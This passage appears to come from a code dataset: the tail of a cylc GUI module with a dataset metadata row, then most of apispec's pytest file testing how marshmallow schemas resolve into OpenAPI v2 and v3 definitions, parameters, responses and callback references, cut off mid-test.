    hbox.pack_end(help_button, False)
    vbox.pack_start(hbox)
    window.add(vbox)
    window.show_all()
def graph_suite(reg, start, stop, graph_opts,
                gcapture_windows, tmpdir, template_opts, window=None):
    """Launch the cylc graph command with some options."""
    # Assemble "cylc graph <template opts> <graph opts> <reg> <start> <stop>".
    options = ' '.join([graph_opts, reg, start, stop])
    command = "cylc graph " + template_opts + " " + options
    capture = Gcapture(command, tmpdir)
    gcapture_windows.append(capture)
    capture.run()
    return False
| gpl-3.0 | 4,249,888,790,959,960,000 | 32.042105 | 79 | 0.660083 | false | 3.46468 | false | false | false |
marshmallow-code/apispec | tests/test_ext_marshmallow.py | 1 | 47705 | import json
import pytest
from marshmallow.fields import Field, DateTime, Dict, String, Nested, List, TimeDelta
from marshmallow import Schema
from apispec import APISpec
from apispec.ext.marshmallow import MarshmallowPlugin
from apispec.ext.marshmallow import common
from apispec.exceptions import APISpecError
from .schemas import (
PetSchema,
AnalysisSchema,
RunSchema,
SelfReferencingSchema,
OrderedSchema,
PatternedObjectSchema,
DefaultValuesSchema,
AnalysisWithListSchema,
)
from .utils import get_schemas, get_parameters, get_responses, get_paths, build_ref
class TestDefinitionHelper:
@pytest.mark.parametrize("schema", [PetSchema, PetSchema()])
def test_can_use_schema_as_definition(self, spec, schema):
spec.components.schema("Pet", schema=schema)
definitions = get_schemas(spec)
props = definitions["Pet"]["properties"]
assert props["id"]["type"] == "integer"
assert props["name"]["type"] == "string"
def test_schema_helper_without_schema(self, spec):
spec.components.schema("Pet", {"properties": {"key": {"type": "integer"}}})
definitions = get_schemas(spec)
assert definitions["Pet"]["properties"] == {"key": {"type": "integer"}}
@pytest.mark.parametrize("schema", [AnalysisSchema, AnalysisSchema()])
def test_resolve_schema_dict_auto_reference(self, schema):
def resolver(schema):
schema_cls = common.resolve_schema_cls(schema)
return schema_cls.__name__
spec = APISpec(
title="Test auto-reference",
version="0.1",
openapi_version="2.0",
plugins=(MarshmallowPlugin(schema_name_resolver=resolver),),
)
with pytest.raises(KeyError):
get_schemas(spec)
spec.components.schema("analysis", schema=schema)
spec.path(
"/test",
operations={
"get": {
"responses": {
"200": {"schema": build_ref(spec, "schema", "analysis")}
}
}
},
)
definitions = get_schemas(spec)
assert 3 == len(definitions)
assert "analysis" in definitions
assert "SampleSchema" in definitions
assert "RunSchema" in definitions
@pytest.mark.parametrize(
"schema", [AnalysisWithListSchema, AnalysisWithListSchema()]
)
def test_resolve_schema_dict_auto_reference_in_list(self, schema):
def resolver(schema):
schema_cls = common.resolve_schema_cls(schema)
return schema_cls.__name__
spec = APISpec(
title="Test auto-reference",
version="0.1",
openapi_version="2.0",
plugins=(MarshmallowPlugin(schema_name_resolver=resolver),),
)
with pytest.raises(KeyError):
get_schemas(spec)
spec.components.schema("analysis", schema=schema)
spec.path(
"/test",
operations={
"get": {
"responses": {
"200": {"schema": build_ref(spec, "schema", "analysis")}
}
}
},
)
definitions = get_schemas(spec)
assert 3 == len(definitions)
assert "analysis" in definitions
assert "SampleSchema" in definitions
assert "RunSchema" in definitions
@pytest.mark.parametrize("schema", [AnalysisSchema, AnalysisSchema()])
def test_resolve_schema_dict_auto_reference_return_none(self, schema):
def resolver(schema):
return None
spec = APISpec(
title="Test auto-reference",
version="0.1",
openapi_version="2.0",
plugins=(MarshmallowPlugin(schema_name_resolver=resolver),),
)
with pytest.raises(KeyError):
get_schemas(spec)
with pytest.raises(
APISpecError, match="Name resolver returned None for schema"
):
spec.components.schema("analysis", schema=schema)
@pytest.mark.parametrize("schema", [AnalysisSchema, AnalysisSchema()])
def test_warning_when_schema_added_twice(self, spec, schema):
spec.components.schema("Analysis", schema=schema)
with pytest.warns(UserWarning, match="has already been added to the spec"):
spec.components.schema("DuplicateAnalysis", schema=schema)
def test_schema_instances_with_different_modifiers_added(self, spec):
class MultiModifierSchema(Schema):
pet_unmodified = Nested(PetSchema)
pet_exclude = Nested(PetSchema, exclude=("name",))
spec.components.schema("Pet", schema=PetSchema())
spec.components.schema("Pet_Exclude", schema=PetSchema(exclude=("name",)))
spec.components.schema("MultiModifierSchema", schema=MultiModifierSchema)
definitions = get_schemas(spec)
pet_unmodified_ref = definitions["MultiModifierSchema"]["properties"][
"pet_unmodified"
]
assert pet_unmodified_ref == build_ref(spec, "schema", "Pet")
pet_exclude = definitions["MultiModifierSchema"]["properties"]["pet_exclude"]
assert pet_exclude == build_ref(spec, "schema", "Pet_Exclude")
def test_schema_instance_with_different_modifers_custom_resolver(self):
class MultiModifierSchema(Schema):
pet_unmodified = Nested(PetSchema)
pet_exclude = Nested(PetSchema(partial=True))
def resolver(schema):
schema_instance = common.resolve_schema_instance(schema)
prefix = "Partial-" if schema_instance.partial else ""
schema_cls = common.resolve_schema_cls(schema)
name = prefix + schema_cls.__name__
if name.endswith("Schema"):
return name[:-6] or name
return name
spec = APISpec(
title="Test Custom Resolver for Partial",
version="0.1",
openapi_version="2.0",
plugins=(MarshmallowPlugin(schema_name_resolver=resolver),),
)
with pytest.warns(None) as record:
spec.components.schema("NameClashSchema", schema=MultiModifierSchema)
assert len(record) == 0
    def test_schema_with_clashing_names(self, spec):
        """Two classes resolving to the same name warn; the second gets a
        numeric suffix (Pet, Pet1)."""
        class Pet(PetSchema):
            another_field = String()
        class NameClashSchema(Schema):
            pet_1 = Nested(PetSchema)
            pet_2 = Nested(Pet)
        with pytest.warns(
            UserWarning, match="Multiple schemas resolved to the name Pet"
        ):
            spec.components.schema("NameClashSchema", schema=NameClashSchema)
        definitions = get_schemas(spec)
        assert "Pet" in definitions
        assert "Pet1" in definitions
    def test_resolve_nested_schema_many_true_resolver_return_none(self):
        """Nested(many=True) and List(Nested(...)) both resolve to array
        properties even when the name resolver returns None."""
        def resolver(schema):
            return None
        class PetFamilySchema(Schema):
            pets_1 = Nested(PetSchema, many=True)
            pets_2 = List(Nested(PetSchema))
        spec = APISpec(
            title="Test auto-reference",
            version="0.1",
            openapi_version="2.0",
            plugins=(MarshmallowPlugin(schema_name_resolver=resolver),),
        )
        spec.components.schema("PetFamily", schema=PetFamilySchema)
        props = get_schemas(spec)["PetFamily"]["properties"]
        pets_1 = props["pets_1"]
        pets_2 = props["pets_2"]
        assert pets_1["type"] == pets_2["type"] == "array"
class TestComponentParameterHelper:
    """Tests for resolving marshmallow schemas passed to ``components.parameter``."""
    @pytest.mark.parametrize("schema", [PetSchema, PetSchema()])
    def test_can_use_schema_in_parameter(self, spec, schema):
        """A schema inside a parameter becomes a $ref and is registered once."""
        # v2 puts the schema directly on the parameter; v3 nests it under content.
        if spec.openapi_version.major < 3:
            param = {"schema": schema}
        else:
            param = {"content": {"application/json": {"schema": schema}}}
        spec.components.parameter("Pet", "body", param)
        parameter = get_parameters(spec)["Pet"]
        assert parameter["in"] == "body"
        if spec.openapi_version.major < 3:
            reference = parameter["schema"]
        else:
            reference = parameter["content"]["application/json"]["schema"]
        assert reference == build_ref(spec, "schema", "Pet")
        resolved_schema = spec.components.schemas["Pet"]
        assert resolved_schema["properties"]["name"]["type"] == "string"
        assert resolved_schema["properties"]["password"]["type"] == "string"
        assert resolved_schema["properties"]["id"]["type"] == "integer"
class TestComponentResponseHelper:
    """Tests for resolving marshmallow schemas passed to ``components.response``."""
    @pytest.mark.parametrize("schema", [PetSchema, PetSchema()])
    def test_can_use_schema_in_response(self, spec, schema):
        """A schema inside a response body becomes a $ref and is registered."""
        if spec.openapi_version.major < 3:
            resp = {"schema": schema}
        else:
            resp = {"content": {"application/json": {"schema": schema}}}
        spec.components.response("GetPetOk", resp)
        response = get_responses(spec)["GetPetOk"]
        if spec.openapi_version.major < 3:
            reference = response["schema"]
        else:
            reference = response["content"]["application/json"]["schema"]
        assert reference == build_ref(spec, "schema", "Pet")
        resolved_schema = spec.components.schemas["Pet"]
        assert resolved_schema["properties"]["id"]["type"] == "integer"
        assert resolved_schema["properties"]["name"]["type"] == "string"
        assert resolved_schema["properties"]["password"]["type"] == "string"
    @pytest.mark.parametrize("schema", [PetSchema, PetSchema()])
    def test_can_use_schema_in_response_header(self, spec, schema):
        """A schema inside a response header is also resolved to a $ref."""
        resp = {"headers": {"PetHeader": {"schema": schema}}}
        spec.components.response("GetPetOk", resp)
        response = get_responses(spec)["GetPetOk"]
        reference = response["headers"]["PetHeader"]["schema"]
        assert reference == build_ref(spec, "schema", "Pet")
        resolved_schema = spec.components.schemas["Pet"]
        assert resolved_schema["properties"]["id"]["type"] == "integer"
        assert resolved_schema["properties"]["name"]["type"] == "string"
        assert resolved_schema["properties"]["password"]["type"] == "string"
    @pytest.mark.parametrize("spec", ("3.0.0",), indirect=True)
    def test_content_without_schema(self, spec):
        """A content object with no schema key passes through unchanged."""
        resp = {"content": {"application/json": {"example": {"name": "Example"}}}}
        spec.components.response("GetPetOk", resp)
        response = get_responses(spec)["GetPetOk"]
        assert response == resp
class TestCustomField:
    """Tests for mapping custom marshmallow fields to OpenAPI types."""
    def test_can_use_custom_field_decorator(self, spec_fixture):
        """map_to_openapi_type accepts a field class or a (type, format) pair.

        Passing a single string (no format) is invalid and raises TypeError.
        """
        @spec_fixture.marshmallow_plugin.map_to_openapi_type(DateTime)
        class CustomNameA(Field):
            pass
        @spec_fixture.marshmallow_plugin.map_to_openapi_type("integer", "int32")
        class CustomNameB(Field):
            pass
        with pytest.raises(TypeError):
            @spec_fixture.marshmallow_plugin.map_to_openapi_type("integer")
            class BadCustomField(Field):
                pass
        class CustomPetASchema(PetSchema):
            name = CustomNameA()
        class CustomPetBSchema(PetSchema):
            name = CustomNameB()
        spec_fixture.spec.components.schema("Pet", schema=PetSchema)
        spec_fixture.spec.components.schema("CustomPetA", schema=CustomPetASchema)
        spec_fixture.spec.components.schema("CustomPetB", schema=CustomPetBSchema)
        props_0 = get_schemas(spec_fixture.spec)["Pet"]["properties"]
        props_a = get_schemas(spec_fixture.spec)["CustomPetA"]["properties"]
        props_b = get_schemas(spec_fixture.spec)["CustomPetB"]["properties"]
        # Baseline Pet: plain string, no format.
        assert props_0["name"]["type"] == "string"
        assert "format" not in props_0["name"]
        # CustomNameA inherits DateTime's mapping (string/date-time).
        assert props_a["name"]["type"] == "string"
        assert props_a["name"]["format"] == "date-time"
        # CustomNameB uses the explicit (integer, int32) mapping.
        assert props_b["name"]["type"] == "integer"
        assert props_b["name"]["format"] == "int32"
def get_nested_schema(schema, field_name):
    """Return the schema object cached on a ``Nested`` field of *schema*.

    marshmallow renamed the private attribute holding the nested schema
    across versions: newer releases expose ``_schema`` while older ones use
    the name-mangled ``_Nested__schema``.  Try the new name first and fall
    back to the old one.
    """
    nested_field = schema._declared_fields[field_name]
    try:
        return nested_field._schema
    except AttributeError:
        return nested_field._Nested__schema
class TestOperationHelper:
    """Tests for schema resolution inside path/operation objects."""
    @pytest.fixture
    def make_pet_callback_spec(self, spec_fixture):
        """Return a factory registering *operations* under a POST callback URL."""
        def _make_pet_spec(operations):
            spec_fixture.spec.path(
                path="/pet",
                operations={
                    "post": {"callbacks": {"petEvent": {"petCallbackUrl": operations}}}
                },
            )
            return spec_fixture
        return _make_pet_spec
    @pytest.mark.parametrize(
        "pet_schema",
        (PetSchema, PetSchema(), PetSchema(many=True), "tests.schemas.PetSchema"),
    )
    @pytest.mark.parametrize("spec_fixture", ("2.0",), indirect=True)
    def test_schema_v2(self, spec_fixture, pet_schema):
        """OpenAPI v2: response and header schemas resolve to one Pet $ref."""
        spec_fixture.spec.path(
            path="/pet",
            operations={
                "get": {
                    "responses": {
                        200: {
                            "schema": pet_schema,
                            "description": "successful operation",
                            "headers": {"PetHeader": {"schema": pet_schema}},
                        }
                    }
                }
            },
        )
        get = get_paths(spec_fixture.spec)["/pet"]["get"]
        # A many=True instance is wrapped in an array whose items hold the ref.
        if isinstance(pet_schema, Schema) and pet_schema.many is True:
            assert get["responses"]["200"]["schema"]["type"] == "array"
            schema_reference = get["responses"]["200"]["schema"]["items"]
            assert (
                get["responses"]["200"]["headers"]["PetHeader"]["schema"]["type"]
                == "array"
            )
            header_reference = get["responses"]["200"]["headers"]["PetHeader"][
                "schema"
            ]["items"]
        else:
            schema_reference = get["responses"]["200"]["schema"]
            header_reference = get["responses"]["200"]["headers"]["PetHeader"]["schema"]
        assert schema_reference == build_ref(spec_fixture.spec, "schema", "Pet")
        assert header_reference == build_ref(spec_fixture.spec, "schema", "Pet")
        assert len(spec_fixture.spec.components.schemas) == 1
        resolved_schema = spec_fixture.spec.components.schemas["Pet"]
        assert resolved_schema == spec_fixture.openapi.schema2jsonschema(PetSchema)
        assert get["responses"]["200"]["description"] == "successful operation"
    @pytest.mark.parametrize(
        "pet_schema",
        (PetSchema, PetSchema(), PetSchema(many=True), "tests.schemas.PetSchema"),
    )
    @pytest.mark.parametrize("spec_fixture", ("3.0.0",), indirect=True)
    def test_schema_v3(self, spec_fixture, pet_schema):
        """OpenAPI v3: content and header schemas resolve to one Pet $ref."""
        spec_fixture.spec.path(
            path="/pet",
            operations={
                "get": {
                    "responses": {
                        200: {
                            "content": {"application/json": {"schema": pet_schema}},
                            "description": "successful operation",
                            "headers": {"PetHeader": {"schema": pet_schema}},
                        }
                    }
                }
            },
        )
        get = get_paths(spec_fixture.spec)["/pet"]["get"]
        # A many=True instance is wrapped in an array whose items hold the ref.
        if isinstance(pet_schema, Schema) and pet_schema.many is True:
            assert (
                get["responses"]["200"]["content"]["application/json"]["schema"]["type"]
                == "array"
            )
            schema_reference = get["responses"]["200"]["content"]["application/json"][
                "schema"
            ]["items"]
            assert (
                get["responses"]["200"]["headers"]["PetHeader"]["schema"]["type"]
                == "array"
            )
            header_reference = get["responses"]["200"]["headers"]["PetHeader"][
                "schema"
            ]["items"]
        else:
            schema_reference = get["responses"]["200"]["content"]["application/json"][
                "schema"
            ]
            header_reference = get["responses"]["200"]["headers"]["PetHeader"]["schema"]
        assert schema_reference == build_ref(spec_fixture.spec, "schema", "Pet")
        assert header_reference == build_ref(spec_fixture.spec, "schema", "Pet")
        assert len(spec_fixture.spec.components.schemas) == 1
        resolved_schema = spec_fixture.spec.components.schemas["Pet"]
        assert resolved_schema == spec_fixture.openapi.schema2jsonschema(PetSchema)
        assert get["responses"]["200"]["description"] == "successful operation"
    @pytest.mark.parametrize(
        "pet_schema",
        (PetSchema, PetSchema(), PetSchema(many=True), "tests.schemas.PetSchema"),
    )
    @pytest.mark.parametrize("spec_fixture", ("3.0.0",), indirect=True)
    def test_callback_schema_v3(self, make_pet_callback_spec, pet_schema):
        """Same resolution as test_schema_v3, but inside a callback operation."""
        spec_fixture = make_pet_callback_spec(
            {
                "get": {
                    "responses": {
                        "200": {
                            "content": {"application/json": {"schema": pet_schema}},
                            "description": "successful operation",
                            "headers": {"PetHeader": {"schema": pet_schema}},
                        }
                    }
                }
            }
        )
        p = get_paths(spec_fixture.spec)["/pet"]
        c = p["post"]["callbacks"]["petEvent"]["petCallbackUrl"]
        get = c["get"]
        # A many=True instance is wrapped in an array whose items hold the ref.
        if isinstance(pet_schema, Schema) and pet_schema.many is True:
            assert (
                get["responses"]["200"]["content"]["application/json"]["schema"]["type"]
                == "array"
            )
            schema_reference = get["responses"]["200"]["content"]["application/json"][
                "schema"
            ]["items"]
            assert (
                get["responses"]["200"]["headers"]["PetHeader"]["schema"]["type"]
                == "array"
            )
            header_reference = get["responses"]["200"]["headers"]["PetHeader"][
                "schema"
            ]["items"]
        else:
            schema_reference = get["responses"]["200"]["content"]["application/json"][
                "schema"
            ]
            header_reference = get["responses"]["200"]["headers"]["PetHeader"]["schema"]
        assert schema_reference == build_ref(spec_fixture.spec, "schema", "Pet")
        assert header_reference == build_ref(spec_fixture.spec, "schema", "Pet")
        assert len(spec_fixture.spec.components.schemas) == 1
        resolved_schema = spec_fixture.spec.components.schemas["Pet"]
        assert resolved_schema == spec_fixture.openapi.schema2jsonschema(PetSchema)
        assert get["responses"]["200"]["description"] == "successful operation"
    @pytest.mark.parametrize("spec_fixture", ("2.0",), indirect=True)
    def test_schema_expand_parameters_v2(self, spec_fixture):
        """OpenAPI v2: a schema in parameters expands per schema2parameters."""
        spec_fixture.spec.path(
            path="/pet",
            operations={
                "get": {"parameters": [{"in": "query", "schema": PetSchema}]},
                "post": {
                    "parameters": [
                        {
                            "in": "body",
                            "description": "a pet schema",
                            "required": True,
                            "name": "pet",
                            "schema": PetSchema,
                        }
                    ]
                },
            },
        )
        p = get_paths(spec_fixture.spec)["/pet"]
        get = p["get"]
        assert get["parameters"] == spec_fixture.openapi.schema2parameters(
            PetSchema(), location="query"
        )
        post = p["post"]
        # Extra keys (description, required, name) are forwarded verbatim.
        assert post["parameters"] == spec_fixture.openapi.schema2parameters(
            PetSchema,
            location="body",
            required=True,
            name="pet",
            description="a pet schema",
        )
    @pytest.mark.parametrize("spec_fixture", ("3.0.0",), indirect=True)
    def test_schema_expand_parameters_v3(self, spec_fixture):
        """OpenAPI v3: query parameters expand; requestBody keeps its schema."""
        spec_fixture.spec.path(
            path="/pet",
            operations={
                "get": {"parameters": [{"in": "query", "schema": PetSchema}]},
                "post": {
                    "requestBody": {
                        "description": "a pet schema",
                        "required": True,
                        "content": {"application/json": {"schema": PetSchema}},
                    }
                },
            },
        )
        p = get_paths(spec_fixture.spec)["/pet"]
        get = p["get"]
        assert get["parameters"] == spec_fixture.openapi.schema2parameters(
            PetSchema(), location="query"
        )
        # Field metadata descriptions are carried onto each expanded parameter.
        for parameter in get["parameters"]:
            description = parameter.get("description", False)
            assert description
            name = parameter["name"]
            assert description == PetSchema.description[name]
        post = p["post"]
        post_schema = spec_fixture.marshmallow_plugin.resolver.resolve_schema_dict(
            PetSchema
        )
        assert (
            post["requestBody"]["content"]["application/json"]["schema"] == post_schema
        )
        assert post["requestBody"]["description"] == "a pet schema"
        assert post["requestBody"]["required"]
    @pytest.mark.parametrize("spec_fixture", ("3.0.0",), indirect=True)
    def test_callback_schema_expand_parameters_v3(self, make_pet_callback_spec):
        """Parameter/requestBody expansion also applies inside callbacks."""
        spec_fixture = make_pet_callback_spec(
            {
                "get": {"parameters": [{"in": "query", "schema": PetSchema}]},
                "post": {
                    "requestBody": {
                        "description": "a pet schema",
                        "required": True,
                        "content": {"application/json": {"schema": PetSchema}},
                    }
                },
            }
        )
        p = get_paths(spec_fixture.spec)["/pet"]
        c = p["post"]["callbacks"]["petEvent"]["petCallbackUrl"]
        get = c["get"]
        assert get["parameters"] == spec_fixture.openapi.schema2parameters(
            PetSchema(), location="query"
        )
        # Field metadata descriptions are carried onto each expanded parameter.
        for parameter in get["parameters"]:
            description = parameter.get("description", False)
            assert description
            name = parameter["name"]
            assert description == PetSchema.description[name]
        post = c["post"]
        post_schema = spec_fixture.marshmallow_plugin.resolver.resolve_schema_dict(
            PetSchema
        )
        assert (
            post["requestBody"]["content"]["application/json"]["schema"] == post_schema
        )
        assert post["requestBody"]["description"] == "a pet schema"
        assert post["requestBody"]["required"]
    @pytest.mark.parametrize("spec_fixture", ("2.0",), indirect=True)
    def test_schema_uses_ref_if_available_v2(self, spec_fixture):
        """OpenAPI v2: a pre-registered schema is referenced, not inlined."""
        spec_fixture.spec.components.schema("Pet", schema=PetSchema)
        spec_fixture.spec.path(
            path="/pet", operations={"get": {"responses": {200: {"schema": PetSchema}}}}
        )
        get = get_paths(spec_fixture.spec)["/pet"]["get"]
        assert get["responses"]["200"]["schema"] == build_ref(
            spec_fixture.spec, "schema", "Pet"
        )
    @pytest.mark.parametrize("spec_fixture", ("3.0.0",), indirect=True)
    def test_schema_uses_ref_if_available_v3(self, spec_fixture):
        """OpenAPI v3: a pre-registered schema is referenced, not inlined."""
        spec_fixture.spec.components.schema("Pet", schema=PetSchema)
        spec_fixture.spec.path(
            path="/pet",
            operations={
                "get": {
                    "responses": {
                        200: {"content": {"application/json": {"schema": PetSchema}}}
                    }
                }
            },
        )
        get = get_paths(spec_fixture.spec)["/pet"]["get"]
        assert get["responses"]["200"]["content"]["application/json"][
            "schema"
        ] == build_ref(spec_fixture.spec, "schema", "Pet")
    @pytest.mark.parametrize("spec_fixture", ("3.0.0",), indirect=True)
    def test_callback_schema_uses_ref_if_available_v3(self, make_pet_callback_spec):
        """Pre-registered schemas are referenced inside callback operations too."""
        spec_fixture = make_pet_callback_spec(
            {
                "get": {
                    "responses": {
                        "200": {"content": {"application/json": {"schema": PetSchema}}}
                    }
                }
            }
        )
        p = get_paths(spec_fixture.spec)["/pet"]
        c = p["post"]["callbacks"]["petEvent"]["petCallbackUrl"]
        get = c["get"]
        assert get["responses"]["200"]["content"]["application/json"][
            "schema"
        ] == build_ref(spec_fixture.spec, "schema", "Pet")
    def test_schema_uses_ref_if_available_name_resolver_returns_none_v2(self):
        """v2: an explicitly registered schema is referenced even when the
        name resolver returns None."""
        def resolver(schema):
            return None
        spec = APISpec(
            title="Test auto-reference",
            version="0.1",
            openapi_version="2.0",
            plugins=(MarshmallowPlugin(schema_name_resolver=resolver),),
        )
        spec.components.schema("Pet", schema=PetSchema)
        spec.path(
            path="/pet", operations={"get": {"responses": {200: {"schema": PetSchema}}}}
        )
        get = get_paths(spec)["/pet"]["get"]
        assert get["responses"]["200"]["schema"] == build_ref(spec, "schema", "Pet")
    def test_schema_uses_ref_if_available_name_resolver_returns_none_v3(self):
        """v3: an explicitly registered schema is referenced even when the
        name resolver returns None."""
        def resolver(schema):
            return None
        spec = APISpec(
            title="Test auto-reference",
            version="0.1",
            openapi_version="3.0.0",
            plugins=(MarshmallowPlugin(schema_name_resolver=resolver),),
        )
        spec.components.schema("Pet", schema=PetSchema)
        spec.path(
            path="/pet",
            operations={
                "get": {
                    "responses": {
                        200: {"content": {"application/json": {"schema": PetSchema}}}
                    }
                }
            },
        )
        get = get_paths(spec)["/pet"]["get"]
        assert get["responses"]["200"]["content"]["application/json"][
            "schema"
        ] == build_ref(spec, "schema", "Pet")
    @pytest.mark.parametrize(
        "pet_schema",
        (PetSchema, PetSchema(), "tests.schemas.PetSchema"),
    )
    def test_schema_name_resolver_returns_none_v2(self, pet_schema):
        """v2: with no usable name, the schema is inlined (has properties)."""
        def resolver(schema):
            return None
        spec = APISpec(
            title="Test resolver returns None",
            version="0.1",
            openapi_version="2.0",
            plugins=(MarshmallowPlugin(schema_name_resolver=resolver),),
        )
        spec.path(
            path="/pet",
            operations={"get": {"responses": {200: {"schema": pet_schema}}}},
        )
        get = get_paths(spec)["/pet"]["get"]
        assert "properties" in get["responses"]["200"]["schema"]
    @pytest.mark.parametrize(
        "pet_schema",
        (PetSchema, PetSchema(), "tests.schemas.PetSchema"),
    )
    def test_schema_name_resolver_returns_none_v3(self, pet_schema):
        """v3: with no usable name, the schema is inlined (has properties)."""
        def resolver(schema):
            return None
        spec = APISpec(
            title="Test resolver returns None",
            version="0.1",
            openapi_version="3.0.0",
            plugins=(MarshmallowPlugin(schema_name_resolver=resolver),),
        )
        spec.path(
            path="/pet",
            operations={
                "get": {
                    "responses": {
                        200: {"content": {"application/json": {"schema": pet_schema}}}
                    }
                }
            },
        )
        get = get_paths(spec)["/pet"]["get"]
        assert (
            "properties"
            in get["responses"]["200"]["content"]["application/json"]["schema"]
        )
    def test_callback_schema_uses_ref_if_available_name_resolver_returns_none_v3(self):
        """Callbacks reference a registered schema even when the resolver
        returns None."""
        def resolver(schema):
            return None
        spec = APISpec(
            title="Test auto-reference",
            version="0.1",
            openapi_version="3.0.0",
            plugins=(MarshmallowPlugin(schema_name_resolver=resolver),),
        )
        spec.components.schema("Pet", schema=PetSchema)
        spec.path(
            path="/pet",
            operations={
                "post": {
                    "callbacks": {
                        "petEvent": {
                            "petCallbackUrl": {
                                "get": {
                                    "responses": {
                                        "200": {
                                            "content": {
                                                "application/json": {
                                                    "schema": PetSchema
                                                }
                                            }
                                        }
                                    }
                                }
                            }
                        }
                    }
                }
            },
        )
        p = get_paths(spec)["/pet"]
        c = p["post"]["callbacks"]["petEvent"]["petCallbackUrl"]
        get = c["get"]
        assert get["responses"]["200"]["content"]["application/json"][
            "schema"
        ] == build_ref(spec, "schema", "Pet")
    @pytest.mark.parametrize("spec_fixture", ("2.0",), indirect=True)
    def test_schema_uses_ref_in_parameters_and_request_body_if_available_v2(
        self, spec_fixture
    ):
        """v2: query params expand (no schema key); body params keep a $ref."""
        spec_fixture.spec.components.schema("Pet", schema=PetSchema)
        spec_fixture.spec.path(
            path="/pet",
            operations={
                "get": {"parameters": [{"in": "query", "schema": PetSchema}]},
                "post": {"parameters": [{"in": "body", "schema": PetSchema}]},
            },
        )
        p = get_paths(spec_fixture.spec)["/pet"]
        assert "schema" not in p["get"]["parameters"][0]
        post = p["post"]
        assert len(post["parameters"]) == 1
        assert post["parameters"][0]["schema"] == build_ref(
            spec_fixture.spec, "schema", "Pet"
        )
    @pytest.mark.parametrize("spec_fixture", ("3.0.0",), indirect=True)
    def test_schema_uses_ref_in_parameters_and_request_body_if_available_v3(
        self, spec_fixture
    ):
        """v3: query params keep a schema key; requestBody holds a $ref."""
        spec_fixture.spec.components.schema("Pet", schema=PetSchema)
        spec_fixture.spec.path(
            path="/pet",
            operations={
                "get": {"parameters": [{"in": "query", "schema": PetSchema}]},
                "post": {
                    "requestBody": {
                        "content": {"application/json": {"schema": PetSchema}}
                    }
                },
            },
        )
        p = get_paths(spec_fixture.spec)["/pet"]
        assert "schema" in p["get"]["parameters"][0]
        post = p["post"]
        schema_ref = post["requestBody"]["content"]["application/json"]["schema"]
        assert schema_ref == build_ref(spec_fixture.spec, "schema", "Pet")
    @pytest.mark.parametrize("spec_fixture", ("3.0.0",), indirect=True)
    def test_callback_schema_uses_ref_in_parameters_and_request_body_if_available_v3(
        self, make_pet_callback_spec
    ):
        """Same parameter/requestBody ref behavior inside callback operations."""
        spec_fixture = make_pet_callback_spec(
            {
                "get": {"parameters": [{"in": "query", "schema": PetSchema}]},
                "post": {
                    "requestBody": {
                        "content": {"application/json": {"schema": PetSchema}}
                    }
                },
            }
        )
        p = get_paths(spec_fixture.spec)["/pet"]
        c = p["post"]["callbacks"]["petEvent"]["petCallbackUrl"]
        assert "schema" in c["get"]["parameters"][0]
        post = c["post"]
        schema_ref = post["requestBody"]["content"]["application/json"]["schema"]
        assert schema_ref == build_ref(spec_fixture.spec, "schema", "Pet")
    @pytest.mark.parametrize("spec_fixture", ("2.0",), indirect=True)
    def test_schema_array_uses_ref_if_available_v2(self, spec_fixture):
        """v2: a schema used as array items resolves to a $ref in the items."""
        spec_fixture.spec.components.schema("Pet", schema=PetSchema)
        spec_fixture.spec.path(
            path="/pet",
            operations={
                "get": {
                    "parameters": [
                        {
                            "name": "petSchema",
                            "in": "body",
                            "schema": {"type": "array", "items": PetSchema},
                        }
                    ],
                    "responses": {
                        200: {"schema": {"type": "array", "items": PetSchema}}
                    },
                }
            },
        )
        get = get_paths(spec_fixture.spec)["/pet"]["get"]
        assert len(get["parameters"]) == 1
        resolved_schema = {
            "type": "array",
            "items": build_ref(spec_fixture.spec, "schema", "Pet"),
        }
        assert get["parameters"][0]["schema"] == resolved_schema
        assert get["responses"]["200"]["schema"] == resolved_schema
    @pytest.mark.parametrize("spec_fixture", ("3.0.0",), indirect=True)
    def test_schema_array_uses_ref_if_available_v3(self, spec_fixture):
        """v3: a schema used as array items resolves to a $ref in the items."""
        spec_fixture.spec.components.schema("Pet", schema=PetSchema)
        spec_fixture.spec.path(
            path="/pet",
            operations={
                "get": {
                    "parameters": [
                        {
                            "name": "Pet",
                            "in": "query",
                            "content": {
                                "application/json": {
                                    "schema": {"type": "array", "items": PetSchema}
                                }
                            },
                        }
                    ],
                    "responses": {
                        200: {
                            "content": {
                                "application/json": {
                                    "schema": {"type": "array", "items": PetSchema}
                                }
                            }
                        }
                    },
                }
            },
        )
        get = get_paths(spec_fixture.spec)["/pet"]["get"]
        assert len(get["parameters"]) == 1
        resolved_schema = {
            "type": "array",
            "items": build_ref(spec_fixture.spec, "schema", "Pet"),
        }
        request_schema = get["parameters"][0]["content"]["application/json"]["schema"]
        assert request_schema == resolved_schema
        response_schema = get["responses"]["200"]["content"]["application/json"][
            "schema"
        ]
        assert response_schema == resolved_schema
    @pytest.mark.parametrize("spec_fixture", ("3.0.0",), indirect=True)
    def test_callback_schema_array_uses_ref_if_available_v3(
        self, make_pet_callback_spec
    ):
        """Array-items schema resolution also applies inside callbacks."""
        spec_fixture = make_pet_callback_spec(
            {
                "get": {
                    "parameters": [
                        {
                            "name": "Pet",
                            "in": "query",
                            "content": {
                                "application/json": {
                                    "schema": {"type": "array", "items": PetSchema}
                                }
                            },
                        }
                    ],
                    "responses": {
                        "200": {
                            "content": {
                                "application/json": {
                                    "schema": {"type": "array", "items": PetSchema}
                                }
                            }
                        }
                    },
                }
            }
        )
        p = get_paths(spec_fixture.spec)["/pet"]
        c = p["post"]["callbacks"]["petEvent"]["petCallbackUrl"]
        get = c["get"]
        assert len(get["parameters"]) == 1
        resolved_schema = {
            "type": "array",
            "items": build_ref(spec_fixture.spec, "schema", "Pet"),
        }
        request_schema = get["parameters"][0]["content"]["application/json"]["schema"]
        assert request_schema == resolved_schema
        response_schema = get["responses"]["200"]["content"]["application/json"][
            "schema"
        ]
        assert response_schema == resolved_schema
    @pytest.mark.parametrize("spec_fixture", ("2.0",), indirect=True)
    def test_schema_partially_v2(self, spec_fixture):
        """v2: schemas nested inside a plain dict's properties become $refs."""
        spec_fixture.spec.components.schema("Pet", schema=PetSchema)
        spec_fixture.spec.path(
            path="/parents",
            operations={
                "get": {
                    "responses": {
                        200: {
                            "schema": {
                                "type": "object",
                                "properties": {
                                    "mother": PetSchema,
                                    "father": PetSchema,
                                },
                            }
                        }
                    }
                }
            },
        )
        get = get_paths(spec_fixture.spec)["/parents"]["get"]
        assert get["responses"]["200"]["schema"] == {
            "type": "object",
            "properties": {
